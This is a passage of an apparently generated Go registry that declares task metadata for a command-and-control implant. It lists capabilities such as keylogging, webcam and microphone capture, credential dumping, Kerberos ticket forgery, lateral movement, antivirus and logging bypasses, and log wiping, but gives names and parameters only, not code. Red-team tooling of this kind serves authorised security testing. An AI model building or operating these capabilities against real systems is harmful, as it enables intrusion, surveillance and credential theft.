package protocol

// Code generated from internal/server/tasktypes.go by migrate-taskspec.mjs.
// The declarations below are the SINGLE SOURCE OF TRUTH for task metadata:
// the teamserver derives its metadata API and the agent derives aliases/help
// from this registry. Edit here, not in the consumers.

func init() {
	for _, s := range []TaskSpec{
		{Type: TaskTypeShell, Name: "Shell", Description: "Execute a shell command", Category: "execution", RequiresShell: true,
			Parameters: []TaskParam{
				{Name: "command", Type: "string", Required: true, Description: "Command to execute"},
				{Name: "shell", Type: "string", Required: false, Description: "cmd.exe or powershell.exe"},
			}},
		{Type: TaskTypePS, Name: "Process List", Description: "List running processes", Category: "discovery"},
		{Type: TaskTypeProcessTree, Name: "Process List (ps alias)", Description: "Process list (alias of ps; not a true parent-child tree view)", Category: "discovery"},
		{Type: TaskTypeScreenshot, Name: "Screenshot", Description: "Capture screen", Category: "collection"},
		{Type: TaskTypeScreenshotWin, Name: "Window Screenshot", Description: "Capture a specific window", Category: "collection"},
		{Type: TaskTypeWebcam, Name: "Webcam Capture", Description: "Capture a still frame from the default webcam", Category: "collection",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: false, Description: "Optional capture params (seconds or device hint)"}}},
		{Type: TaskTypeMic, Name: "Microphone Capture", Description: "Record audio from the default microphone", Category: "collection",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: false, Description: "Duration in seconds (default 5)"}}},
		{Type: TaskTypeKeylogStart, Name: "Keylogger Start", Description: "Start keylogging", Category: "collection"},
		{Type: TaskTypeKeylogStop, Name: "Keylogger Stop", Description: "Stop keylogging", Category: "collection"},
		{Type: TaskTypeKeylogDump, Name: "Keylogger Dump", Description: "Dump captured keystrokes", Category: "collection"},
		{Type: TaskTypeSuspend, Name: "Suspend Process", Description: "Suspend a process by PID", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "int", Required: true, Description: "PID to suspend"}}},
		{Type: TaskTypeResume, Name: "Resume Process", Description: "Resume a suspended process", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "int", Required: true, Description: "PID to resume"}}},
		{Type: TaskTypeKillProc, Name: "Kill Process", Description: "Terminate a process by PID", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "int", Required: true, Description: "PID to kill"}}},
		{Type: TaskTypeClipboardGet, Name: "Clipboard Get", Description: "Read clipboard contents", Category: "collection"},
		{Type: TaskTypeClipboardSet, Name: "Clipboard Set", Description: "Write to clipboard", Category: "collection",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Text to set"}}},
		{Type: TaskTypeFind, Name: "Find Files", Description: "Search for files matching a pattern", Category: "discovery",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Filename pattern"}}},
		{Type: TaskTypeRegGet, Name: "Registry Get", Description: "Read a registry value", Category: "discovery",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Registry path"}}},
		{Type: TaskTypeRegSet, Name: "Registry Set", Description: "Set a registry value", Category: "defense-evasion",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Registry path=value"}}},
		{Type: TaskTypeRegDelete, Name: "Registry Delete", Description: "Delete a registry key", Category: "defense-evasion",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Registry path"}}},
		{Type: TaskTypeReboot, Name: "Reboot", Description: "Reboot the system", Category: "impact"},
		{Type: TaskTypeShutdown, Name: "Shutdown", Description: "Shut down the system", Category: "impact"},
		{Type: TaskTypeDrives, Name: "List Drives", Description: "List available drives", Category: "discovery"},
		{Type: TaskTypeBeaconNow, Name: "Beacon Now", Description: "Force immediate beacon check-in", Category: "c2"},
		{Type: TaskTypeServices, Name: "List Services", Description: "List Windows services", Category: "discovery"},
		{Type: TaskTypePortscan, Name: "Port Scan", Description: "Scan TCP ports on a target", Category: "discovery",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Target and ports"}}},
		{Type: TaskTypeNetstat, Name: "Network Connections", Description: "Show active network connections", Category: "discovery"},
		{Type: TaskTypeUsers, Name: "List Users", Description: "List logged-in users", Category: "discovery"},
		{Type: TaskTypeAV, Name: "Anti-Virus Check", Description: "List installed AV products", Category: "discovery"},
		{Type: TaskTypeDownloadURL, Name: "Download URL", Description: "Download a file from a URL", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "URL to download"}}},
		{Type: TaskTypeUninstall, Name: "Uninstall Agent", Description: "Self-uninstall the agent", Category: "c2"},
		{Type: TaskTypeSetSleep, Name: "Set Sleep", Description: "Change beacon sleep interval", Category: "c2",
			Parameters: []TaskParam{{Name: "command", Type: "int", Required: true, Description: "Sleep in seconds"}}},
		{Type: TaskTypeCreds, Name: "Dump Credentials (scripted)", Description: "Scripted: save SAM/SYSTEM/SECURITY hives and an lsass minidump to disk — not an in-memory parse", Category: "credential-access"},
		{Type: TaskTypeInject, Name: "Shellcode Inject", Description: "Inject shellcode into a process", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "PID"}}},
		{Type: TaskTypeInjectMethods, Name: "Injection Methods", Description: "List available injection methods", Category: "execution"},
		{Type: TaskTypeSpawn, Name: "Spawn", Description: "Spawn a new agent process", Category: "execution"},
		{Type: TaskTypeMigrate, Name: "Migrate", Description: "Copy the implant into a fresh process context and self-delete", Category: "defense-evasion",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: false, Description: "Destination path for the migrated copy"}}},
		{Type: TaskTypeShinject, Name: "Shellcode Inject (self)", Description: "Inject shellcode into self", Category: "execution"},
		{Type: TaskTypeShspawn, Name: "Shellcode Spawn", Description: "Spawn shellcode in new process", Category: "execution"},
		{Type: TaskTypeLateral, Name: "Lateral Movement", Description: "Move laterally to another host", Category: "lateral-movement",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Target and method"}}},
		{Type: TaskTypeLateralWMI, Name: "Lateral WMI", Description: "WMI lateral movement", Category: "lateral-movement"},
		{Type: TaskTypeLateralWinRM, Name: "Lateral WinRM", Description: "WinRM lateral movement", Category: "lateral-movement"},
		{Type: TaskTypeLateralPsexec, Name: "Lateral PsExec", Description: "PsExec lateral movement", Category: "lateral-movement"},
		{Type: TaskTypeLateralDCOM, Name: "Lateral DCOM", Description: "DCOM lateral movement", Category: "lateral-movement"},
		{Type: TaskTypeSocks, Name: "SOCKS Proxy", Description: "Start a SOCKS proxy through agent", Category: "c2",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Port and action"}}},
		{Type: TaskTypeKillAV, Name: "Kill AV", Description: "Attempt to kill antivirus processes", Category: "defense-evasion"},
		{Type: TaskTypeElevate, Name: "Elevate", Description: "Attempt privilege escalation", Category: "privilege-escalation",
			RequiresElev: true},
		{Type: TaskTypeBOF, Name: "BOF", Description: "Execute Beacon Object File", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "BOF name and args"}}},
		{Type: TaskTypeElevatePN, Name: "PrintNightmare", Description: "Elevate via PrintNightmare", Category: "privilege-escalation"},
		{Type: TaskTypeExecAssembly, Name: "Execute Assembly", Description: "Execute .NET assembly in memory", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Assembly name"}}},
		{Type: TaskTypeKerberoast, Name: "Kerberoast", Description: "Request TGS for SPN accounts", Category: "credential-access"},
		{Type: TaskTypePasswordSpray, Name: "Password Spray", Description: "Try a password against multiple AD accounts with lockout awareness", Category: "credential-access",
			Parameters: []TaskParam{
				{Name: "command", Type: "string", Required: true, Description: "password|domain|[dc_ip]|[delay_ms]"},
				{Name: "data", Type: "string", Required: true, Description: "Newline-separated username list"},
			}},
		{Type: TaskTypeCredCheck, Name: "Credential Check", Description: "Validate a single credential against the domain with a lockout fuse", Category: "credential-access",
			Parameters: []TaskParam{
				{Name: "command", Type: "string", Required: true, Description: "user|domain|password|[dc_ip]"},
			}},
		{Type: TaskTypeMimikatz, Name: "Mimikatz (scripted)", Description: "Scripted: requires Settings → Modules Invoke-Mimikatz.ps1 (no remote IEX)", Category: "credential-access",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Mimikatz command"}}},
		{Type: TaskTypeDPAPIMasterKey, Name: "DPAPI MasterKey", Description: "Extract DPAPI master keys", Category: "credential-access"},
		{Type: TaskTypeDPAPIBlob, Name: "DPAPI Blob", Description: "Decrypt DPAPI blob", Category: "credential-access"},
		{Type: TaskTypeDPAPIBrowser, Name: "DPAPI Browser", Description: "Decrypt browser DPAPI data", Category: "credential-access"},
		{Type: TaskTypeLSABypass, Name: "LSA Bypass", Description: "Bypass LSA protection", Category: "defense-evasion"},
		{Type: TaskTypeADCSFind, Name: "ADCS Find", Description: "Enumerate ADCS certificate templates", Category: "discovery"},
		{Type: TaskTypeADCSRequest, Name: "ADCS Request", Description: "Request a certificate", Category: "credential-access"},
		{Type: TaskTypeShadowCreds, Name: "Shadow Credentials", Description: "Add shadow credentials to an account", Category: "credential-access"},
		{Type: TaskTypeLDAPUsers, Name: "LDAP Users", Description: "Query AD users via LDAP", Category: "discovery"},
		{Type: TaskTypeLDAPGroups, Name: "LDAP Groups", Description: "Query AD groups via LDAP", Category: "discovery"},
		{Type: TaskTypeLDAPComputers, Name: "LDAP Computers", Description: "Query AD computers via LDAP", Category: "discovery"},
		{Type: TaskTypeLDAPSPN, Name: "LDAP SPN", Description: "Query SPN records via LDAP", Category: "discovery"},
		{Type: TaskTypeLDAPACL, Name: "LDAP ACL", Description: "Query AD ACLs via LDAP", Category: "discovery"},
		{Type: TaskTypeLDAPQuery, Name: "LDAP Query", Description: "Run arbitrary LDAP query", Category: "discovery",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "LDAP filter"}}},
		{Type: TaskTypeLS, Name: "List Directory", Description: "List directory contents", Category: "discovery",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: false, Description: "Directory path"}}},
		{Type: TaskTypeDelete, Name: "Delete File", Description: "Delete a file or directory", Category: "impact",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "File path"}}},
		{Type: TaskTypeRead, Name: "Read File", Description: "Read a file from the agent", Category: "collection",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "File path"}}},
		{Type: TaskTypeDownload, Name: "Download File", Description: "Download a file from the agent", Category: "collection",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Remote path"}}},
		{Type: TaskTypeUpload, Name: "Upload File", Description: "Upload a file to the agent", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Target path"}}},
		{Type: TaskTypeMkdir, Name: "Make Directory", Description: "Create a directory (parents created as needed)", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Directory path"}}},
		{Type: TaskTypeRename, Name: "Rename / Move", Description: "Rename or move a file or directory", Category: "execution",
			Parameters: []TaskParam{
				{Name: "command", Type: "string", Required: true, Description: "Current path"},
				{Name: "data", Type: "string", Required: true, Description: "New path"},
			}},
		{Type: TaskTypeChmod, Name: "Change Mode", Description: "Change file mode bits (POSIX; on Windows only the read-only bit is mapped)", Category: "execution",
			Parameters: []TaskParam{
				{Name: "command", Type: "string", Required: true, Description: "File path"},
				{Name: "data", Type: "string", Required: true, Description: "Octal mode, e.g. 0755"},
			}},
		{Type: TaskTypeLPortFwdStart, Name: "Local Port Forward", Description: "Bind a loopback listener on the agent and tunnel connections through the C2 server to the target (target sees the C2 egress IP). Gated by server.lportfwd_enabled", Category: "c2",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "lport|targetHost:targetPort"}}},
		{Type: TaskTypeLPortFwdStop, Name: "Stop Local Port Forward", Description: "Stop a tunneled local port forward by its listener port", Category: "c2",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "lport"}}},
		{Type: TaskTypeHostInfo, Name: "Host Info", Description: "Structured host profile sweep. Category selects the section so one expensive collection is never forced; result is JSON for table rendering", Category: "discovery", Aliases: []string{"hi"},
			Parameters: []TaskParam{
				{Name: "command", Type: "string", Required: false, Description: "Category: all (default) | security | system | software | network | runtime"},
				{Name: "data", Type: "string", Required: false, Description: "Optional filter keyword (software category: substring match on product name)"},
			}},
		{Type: TaskTypeHelp, Name: "Help", Description: "List available commands with aliases, parameters and descriptions", Category: "c2"},
		{Type: TaskTypeNet, Name: "Network Enum", Description: "Enumerate network resources", Category: "discovery",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Net command args"}}},
		{Type: TaskTypePowerpick, Name: "PowerPick", Description: "Run PowerShell without powershell.exe", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "PowerShell command"}}},
		{Type: TaskTypePELoader, Name: "PE Loader", Description: "Load PE from memory", Category: "execution"},
		{Type: TaskTypeRPortFwdStart, Name: "Reverse Port Forward", Description: "Start reverse port forward", Category: "c2",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Port config"}}},
		{Type: TaskTypeRPortFwdStop, Name: "Reverse Port Forward Stop", Description: "Stop reverse port forward", Category: "c2",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Forward ID"}}},
		{Type: TaskTypeDCSync, Name: "DCSync", Description: "DCSync attack against a domain", Category: "credential-access",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Target user"}}},
		{Type: TaskTypeGoldenTicket, Name: "Golden Ticket", Description: "Forge a Golden Ticket", Category: "credential-access",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Ticket params"}}},
		{Type: TaskTypeSilverTicket, Name: "Silver Ticket", Description: "Forge a Silver Ticket", Category: "credential-access",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Ticket params"}}},
		{Type: TaskTypeASREPRoast, Name: "AS-REP Roast", Description: "Roast AS-REP responses", Category: "credential-access"},
		{Type: TaskTypePassTheHash, Name: "Pass the Hash", Description: "Pass-the-hash authentication", Category: "lateral-movement",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Hash and target"}}},
		{Type: TaskTypePassTheTicket, Name: "Pass the Ticket", Description: "Pass-the-ticket authentication", Category: "lateral-movement",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Ticket and target"}}},
		{Type: TaskTypePersistenceAdd, Name: "Persistence Add", Description: "Install persistence mechanism", Category: "persistence",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Persistence method"}}},
		{Type: TaskTypePersistenceList, Name: "Persistence List", Description: "List persistence mechanisms", Category: "persistence"},
		{Type: TaskTypePersistenceRem, Name: "Persistence Remove", Description: "Remove persistence mechanism", Category: "persistence",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Persistence ID"}}},
		{Type: TaskTypeBrowserSteal, Name: "Browser Steal", Description: "Steal browser passwords", Category: "credential-access"},
		{Type: TaskTypeCookieExport, Name: "Cookie Export", Description: "Export browser cookies", Category: "collection"},
		{Type: TaskTypeVPNCreds, Name: "VPN Credentials", Description: "Extract VPN credentials", Category: "credential-access"},
		{Type: TaskTypeWifiCreds, Name: "WiFi Credentials", Description: "Extract WiFi credentials", Category: "credential-access"},
		{Type: TaskTypePrivescCheck, Name: "PrivEsc Check", Description: "Recon check for escalation vectors — not a guaranteed elevation", Category: "privilege-escalation"},
		{Type: TaskTypeRemoteInput, Name: "Remote Input", Description: "Send mouse/keyboard input remotely", Category: "collection"},
		{Type: TaskTypeUACBypass, Name: "UAC Bypass", Description: "Bypass UAC", Category: "privilege-escalation"},
		{Type: TaskTypeAMSIByPass, Name: "AMSI Bypass", Description: "Bypass AMSI", Category: "defense-evasion"},
		{Type: TaskTypeETWByPass, Name: "ETW Bypass", Description: "Bypass ETW", Category: "defense-evasion"},
		{Type: TaskTypeAMSIHardwareBP, Name: "AMSI HW BP", Description: "AMSI bypass via HW breakpoints", Category: "defense-evasion"},
		{Type: TaskTypeETWHardwareBP, Name: "ETW HW BP", Description: "ETW bypass via HW breakpoints", Category: "defense-evasion"},
		{Type: TaskTypeBlockDLLs, Name: "Block DLLs", Description: "Block non-Microsoft DLLs", Category: "defense-evasion"},
		{Type: TaskTypeUnhookNtdll, Name: "Unhook NTDLL", Description: "Unhook ntdll.dll", Category: "defense-evasion"},
		{Type: TaskTypeProtectProcess, Name: "Protect Process", Description: "Protect process from termination", Category: "defense-evasion"},
		{Type: TaskTypeRunEvasion, Name: "Run Evasion", Description: "Run an evasion technique by name", Category: "defense-evasion",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Technique name (amsi, etw, blockdlls, veh, syscall, etc.)"}}},
		{Type: TaskTypeCleanup, Name: "Cleanup", Description: "Clean up artifacts", Category: "defense-evasion"},
		{Type: TaskTypeLogWipe, Name: "Log Wipe", Description: "Wipe event logs", Category: "defense-evasion"},
		{Type: TaskTypeTrackWipe, Name: "Track Wipe", Description: "Wipe tracking files", Category: "defense-evasion"},
		{Type: TaskTypeSelfDelete, Name: "Self Delete", Description: "Delete agent binary", Category: "defense-evasion"},
		{Type: TaskTypeKill, Name: "Kill Agent", Description: "Terminate the agent process", Category: "c2"},
		{Type: TaskTypeSelfUpdate, Name: "Self Update", Description: "Replace agent binary with new version", Category: "c2",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Download URL"}}},
		{Type: TaskTypeReflectDLLInject, Name: "Reflective DLL Inject", Description: "Inject reflective DLL into process", Category: "execution",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "PID"}}},
		{Type: TaskTypeCoercePrinterBug, Name: "Coerce Printer Bug", Description: "Coerce NTLM auth via MS-RPRN", Category: "credential-access"},
		{Type: TaskTypeCoercePetitPotam, Name: "Coerce PetitPotam", Description: "Coerce NTLM auth via EFSRPC", Category: "credential-access"},
		{Type: TaskTypeCoerceDFS, Name: "Coerce DFS", Description: "Coerce NTLM auth via DFS", Category: "credential-access"},
		{Type: TaskTypeRelayNTLMStart, Name: "NTLM Relay", Description: "Start NTLM relay listener", Category: "credential-access"},
		{Type: TaskTypeRelayNTLMStop, Name: "NTLM Relay Stop", Description: "Stop NTLM relay listener", Category: "credential-access"},
		{Type: TaskTypeNTLMHelp, Name: "NTLM Help", Description: "Show NTLM relay help", Category: "credential-access"},
		{Type: TaskTypeCertStoreList, Name: "Cert Store List", Description: "List certificate store contents", Category: "discovery"},
		{Type: TaskTypeCLRExecAssembly, Name: "CLR Exec Assembly", Description: "Execute .NET assembly via CLR", Category: "execution"},
		{Type: TaskTypeCLRPowerShell, Name: "CLR PowerShell", Description: "Run PowerShell via CLR", Category: "execution"},
		{Type: TaskTypeRunEgress, Name: "Egress Check", Description: "Test egress connectivity", Category: "discovery"},
		{Type: TaskTypeSharpHound, Name: "SharpHound", Description: "Run SharpHound for BloodHound", Category: "discovery"},
		{Type: TaskTypeSetC2Mode, Name: "Set C2 Mode", Description: "Switch between C2 modes", Category: "c2"},
		{Type: TaskTypeInteractiveShellStart, Name: "Interactive Shell", Description: "Start interactive shell session", Category: "execution"},
		{Type: TaskTypeInteractiveShellWrite, Name: "Interactive Shell Write", Description: "Send input to interactive shell", Category: "execution"},
		{Type: TaskTypeInteractiveShellStop, Name: "Interactive Shell Stop", Description: "Stop interactive shell session", Category: "execution"},
		{Type: TaskTypeTunnelAddRoute, Name: "Tunnel Add Route", Description: "Add tunnel route", Category: "c2"},
		{Type: TaskTypeTunnelRemoveRoute, Name: "Tunnel Remove Route", Description: "Remove tunnel route", Category: "c2"},
		{Type: TaskTypeGossipDiscover, Name: "P2P Discover", Description: "Discover peer agents", Category: "c2"},
		{Type: TaskTypeContainerDetect, Name: "Container Detect", Description: "Detect container environment", Category: "discovery"},
		{Type: TaskTypeContainerEscape, Name: "Container Escape", Description: "Attempt container escape", Category: "privilege-escalation"},
		{Type: TaskTypeContainerDocker, Name: "Container Docker", Description: "Docker container operations", Category: "execution"},
		{Type: TaskTypeContainerK8s, Name: "Container K8s", Description: "Kubernetes container operations", Category: "execution"},
		{Type: TaskTypeSetSleepMask, Name: "Set Sleep Mask", Description: "Set sleep mask", Category: "defense-evasion"},
		{Type: TaskTypeSetSleepMaskAdvanced, Name: "Set Sleep Mask Advanced", Description: "Set advanced sleep mask", Category: "defense-evasion"},
		{Type: TaskTypeSandboxDetect, Name: "Sandbox Detect", Description: "Detect sandbox environment", Category: "defense-evasion"},
		{Type: TaskTypeSandboxDetectAdvanced, Name: "Sandbox Detect Advanced", Description: "Advanced sandbox detection", Category: "defense-evasion"},
		{Type: TaskTypeSetWorkingHours, Name: "Set Working Hours", Description: "Set agent working hours", Category: "c2"},
		{Type: TaskTypeSetKillDate, Name: "Set Kill Date", Description: "Set agent expiry date", Category: "c2"},
		{Type: TaskTypeClearKillDate, Name: "Clear Kill Date", Description: "Clear agent expiry date", Category: "c2"},
		{Type: TaskTypeBOFInfection, Name: "BOF Infection", Description: "Download and execute BOF from server", Category: "execution"},
		{Type: TaskTypeEvasionKernelCallback, Name: "Kernel Callback", Description: "Kernel callback evasion", Category: "defense-evasion"},
		{Type: TaskTypeEvasionETWTI, Name: "ETW TI", Description: "ETW threat intel evasion", Category: "defense-evasion"},
		{Type: TaskTypeEvasionEnumCallbacks, Name: "Enum Callbacks", Description: "Enumerate kernel callbacks", Category: "defense-evasion"},
		{Type: TaskTypeEvasionObjCB, Name: "ObjCB Evasion", Description: "Object callback evasion", Category: "defense-evasion"},
		{Type: TaskTypeEvasionImgLoad, Name: "Image Load Evasion", Description: "Image load callback evasion", Category: "defense-evasion"},
		{Type: TaskTypeFindDelegation, Name: "Find Delegation", Description: "Find Kerberos delegation", Category: "discovery"},
		{Type: TaskTypeConstrainedDeleg, Name: "Constrained Delegation", Description: "Exploit constrained delegation", Category: "credential-access"},
		{Type: TaskTypeRBCD, Name: "RBCD", Description: "Resource-based constrained delegation", Category: "credential-access"},
		{Type: TaskTypeBronzeBit, Name: "Bronze Bit", Description: "Bronze Bit attack", Category: "credential-access"},
		{Type: TaskTypeAdminSDHolder, Name: "AdminSDHolder", Description: "AdminSDHolder operations", Category: "persistence"},
		{Type: TaskTypeDCSyncMachine, Name: "DCSync Machine", Description: "DCSync machine account", Category: "credential-access"},
		{Type: TaskTypeTokenListProcs, Name: "Token List Procs", Description: "List processes for token theft", Category: "privilege-escalation"},
		{Type: TaskTypeTokenSteal, Name: "Token Steal", Description: "Steal access token from process", Category: "privilege-escalation",
			Parameters: []TaskParam{{Name: "command", Type: "int", Required: true, Description: "PID to steal from"}}},
		{Type: TaskTypeTokenMake, Name: "Token Make", Description: "Create access token for user", Category: "privilege-escalation",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Username"}}},
		{Type: TaskTypeTokenRevert, Name: "Token Revert", Description: "Revert to original token", Category: "privilege-escalation"},
		{Type: TaskTypeTokenWhoami, Name: "Token Whoami", Description: "Show current token identity", Category: "discovery"},
		{Type: TaskTypeNamedPipeImp, Name: "Named Pipe Impersonation", Description: "Impersonate via named pipe", Category: "privilege-escalation"},
		{Type: TaskTypeJuicyPotato, Name: "Juicy Potato", Description: "Juicy Potato privilege escalation", Category: "privilege-escalation"},
		{Type: TaskTypeFodhelper, Name: "Fodhelper", Description: "Fodhelper UAC bypass", Category: "privilege-escalation"},
		{Type: TaskTypeSlui, Name: "Slui UAC", Description: "Slui UAC bypass", Category: "privilege-escalation"},
		{Type: TaskTypeEventvwr, Name: "EventVwr UAC", Description: "Event Viewer UAC bypass", Category: "privilege-escalation"},
		{Type: TaskTypeComputerDefaults, Name: "ComputerDefaults UAC", Description: "ComputerDefaults UAC bypass", Category: "privilege-escalation"},
		{Type: TaskTypeSSHLateral, Name: "SSH Lateral", Description: "SSH lateral movement", Category: "lateral-movement",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "SSH target"}}},
		{Type: TaskTypeSSHKeygen, Name: "SSH Keygen", Description: "Generate SSH key pair", Category: "lateral-movement"},
		{Type: TaskTypeSSHTunnel, Name: "SSH Tunnel", Description: "Create SSH tunnel", Category: "c2"},
		{Type: TaskTypeSCPUpload, Name: "SCP Upload", Description: "Upload file via SCP", Category: "execution"},
		{Type: TaskTypeCloudSteal, Name: "Cloud Token Theft", Description: "Steal cloud access tokens", Category: "credential-access"},
		{Type: TaskTypeTunStart, Name: "TUN Start", Description: "Open a Linux TUN and frame IP packets over the beacon (needs /dev/net/tun). Pair with teamserver UDP helper.", Category: "c2",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: false, Description: "CIDR (default 10.66.0.2/24)"}}},
		{Type: TaskTypeTunStop, Name: "TUN Stop", Description: "Stop the agent TUN interface", Category: "c2"},
		{Type: TaskTypeSccmRecon, Name: "SCCM Recon", Description: "Enumerate SCCM/MECM client config (registry + WMI). Windows only, discovery only.", Category: "discovery"},
		{Type: TaskTypeEntraPRT, Name: "Entra PRT Recon", Description: "dsregcmd / CloudAP recon. PRT blob dump needs SYSTEM; this reports join state.", Category: "credential-access"},
		{Type: TaskTypeFileHunt, Name: "File Hunt", Description: "Capped recursive glob listing (default: user profile, max 200 hits). Optional small-file download with byte caps — not whole-disk exfil.", Category: "discovery", Aliases: []string{"hunt"},
			Parameters: []TaskParam{
				{Name: "command", Type: "string", Required: false, Description: "Comma-separated globs (default *.docx,*.xlsx,*.pdf,*.txt,*.kdbx,*.ovpn)"},
				{Name: "path", Type: "string", Required: false, Description: "Search root (default user profile / HOME, not C:\\ or /)"},
				{Name: "data", Type: "string", Required: false, Description: "max_files=200,max_bytes=524288,download=0,max_depth=8"},
			}},
		{Type: TaskTypeScreenTriggerStart, Name: "Screen Trigger Start", Description: "Watch the foreground window title and screenshot when it matches. Cooldown per title.", Category: "collection",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: true, Description: "Title substring[,interval_seconds]"}}},
		{Type: TaskTypeScreenTriggerStop, Name: "Screen Trigger Stop", Description: "Stop foreground-window screenshot trigger", Category: "collection"},
		{Type: TaskTypeUSBEnum, Name: "USB Enum", Description: "List logical volumes and flag removable drives. Discovery only.", Category: "discovery", Aliases: []string{"usb"}},
		{Type: TaskTypeUSBDrop, Name: "USB Drop", Description: "Copy an operator-specified file onto a removable volume. Refuses to use the implant binary as the source.", Category: "lateral-movement", RequiresApproval: true,
			Parameters: []TaskParam{
				{Name: "path", Type: "string", Required: true, Description: "Source file on the implant (required; never defaults to the implant exe)"},
				{Name: "command", Type: "string", Required: false, Description: "Destination removable root (empty = first removable)"},
				{Name: "data", Type: "string", Required: false, Description: "hide=1 to set hidden attribute on Windows"},
			}},
		{Type: TaskTypeBrowserHistory, Name: "Browser History", Description: "Read Chromium/Firefox/Safari history SQLite (copy-then-query, capped). URLs and titles only.", Category: "collection",
			Parameters: []TaskParam{{Name: "command", Type: "string", Required: false, Description: "Browser filter: chrome, edge, brave, firefox, safari, all"}}},
		{Type: TaskTypeSessionRecon, Name: "Session Recon", Description: "Logged-on sessions, console, lock/idle hints, active window.", Category: "discovery"},
		{Type: TaskTypeADCSESC1, Name: "ADCS ESC1", Description: "ADCS ESC1 attack", Category: "credential-access"},
		{Type: TaskTypeADCSESC2, Name: "ADCS ESC2", Description: "ADCS ESC2 attack", Category: "credential-access"},
		{Type: TaskTypeADCSESC3, Name: "ADCS ESC3", Description: "ADCS ESC3 attack", Category: "credential-access"},
		{Type: TaskTypeADCSESC4, Name: "ADCS ESC4", Description: "ADCS ESC4 attack", Category: "credential-access"},
		{Type: TaskTypeADCSESC5, Name: "ADCS ESC5", Description: "ADCS ESC5 attack", Category: "credential-access"},
		{Type: TaskTypeADCSESC6, Name: "ADCS ESC6", Description: "ADCS ESC6 attack", Category: "credential-access"},
		{Type: TaskTypeADCSESC7, Name: "ADCS ESC7", Description: "ADCS ESC7 attack", Category: "credential-access"},
		{Type: TaskTypeADCSESC8, Name: "ADCS ESC8", Description: "ADCS ESC8 attack", Category: "credential-access"},
		{Type: TaskTypeADCSFullAudit, Name: "ADCS Audit", Description: "Full ADCS audit", Category: "discovery"},
		{Type: TaskTypeSetSleepMode, Name: "Set Sleep Mode", Description: "Change sleep variation mode", Category: "c2"},
		{Type: TaskTypeGetSleepMode, Name: "Get Sleep Mode", Description: "Show current sleep mode", Category: "c2"},
		{Type: TaskTypeProfileRotate, Name: "Profile Rotate", Description: "Rotate communication profile", Category: "c2"},
		{Type: TaskTypeConfigPush, Name: "Config Push", Description: "Push configuration to agent", Category: "c2"},
		{Type: TaskTypeEdrStatus, Name: "EDR Status", Description: "Check EDR status", Category: "discovery"},
		{Type: TaskTypeGhostModeStatus, Name: "Ghost Mode Status", Description: "Check ghost mode status", Category: "c2"},
		{Type: TaskTypeGhostModeExit, Name: "Ghost Mode Exit", Description: "Exit ghost mode", Category: "c2"},
		{Type: TaskTypeScreenStreamSt, Name: "Screen Stream St", Category: "other"},
		{Type: TaskTypeScreenStreamSp, Name: "Screen Stream Sp", Category: "other"},
		{Type: TaskTypeListInjectMeth, Name: "List Inject Meth", Category: "other"},
		{Type: TaskTypeLateralSCF, Name: "Lateral SCF", Category: "other"},
		{Type: TaskTypeLateralList, Name: "Lateral List", Category: "other"},
		{Type: TaskTypeNetScanSMB, Name: "Net Scan SMB", Category: "other"},
		{Type: TaskTypeNetEnumHosts, Name: "Net Enum Hosts", Category: "other"},
		{Type: TaskTypeExecAssemblyFR, Name: "Exec Assembly FR", Category: "other"},
		{Type: TaskTypeETWNtraceBypass, Name: "ETWNtrace Bypass", Category: "other"},
		{Type: TaskTypeAMSISessionByp, Name: "AMSISession Byp", Category: "other"},
		{Type: TaskTypeRev2Self, Name: "Rev2 Self", Category: "other"},
	} {
